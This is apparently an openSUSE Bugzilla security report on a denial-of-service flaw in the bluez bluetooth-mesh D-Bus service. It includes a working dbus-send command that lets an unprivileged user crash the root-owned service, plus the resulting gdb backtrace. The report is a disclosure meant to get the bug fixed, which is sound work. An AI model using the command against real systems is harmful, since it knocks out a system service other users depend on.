Bug ID 1152672
Summary VUL-0: bluez: bluetooth-mesh D-Bus service can be crashed by regular user
Classification openSUSE
Product openSUSE Tumbleweed
Version Current
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee seife@novell.slipkontur.de
Reporter matthias.gerstner@suse.com
QA Contact qa-bugs@suse.de
CC matthias.gerstner@suse.com, vbotka@suse.com
Blocks 1151518
Found By ---
Blocker --- 

+++ This bug was initially created as a clone of Bug #1151518

The new bluetooth-mesh D-Bus service which is reviewed in bug 1151518 has a
DoS vulnerability that allows a regular user to crash the root owned D-Bus
service. To do so the following D-Bus call can be employed:

$ dbus-send --system --type=method_call --print-reply --dest=org.bluez.mesh
/org/bluez/mesh org.bluez.mesh.Network1.Join objpath:/org/gnome/DisplayManager
array:byte:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

After a timeout of about 20 seconds the D-Bus service will crash due to a null
pointer dereference with the following backtrace:

node_init_cb (node=0x0, agent=0x0) at mesh/mesh.c:359
359            reply = dbus_error(join_pending->msg, MESH_ERROR_FAILED,
(gdb) bt
    user_data=0x5555555be170) at mesh/node.c:1760
    dbus=<optimized out>) at ell/dbus.c:216
    user_data=0x5555555a6e00) at ell/dbus.c:279
    user_data=0x5555555a7ef0) at ell/io.c:126
    at ell/main.c:642
    at mesh/main.c:205

The reason is probably that the `join_pending` data structure has already been
freed in a different function.

You are receiving this mail because: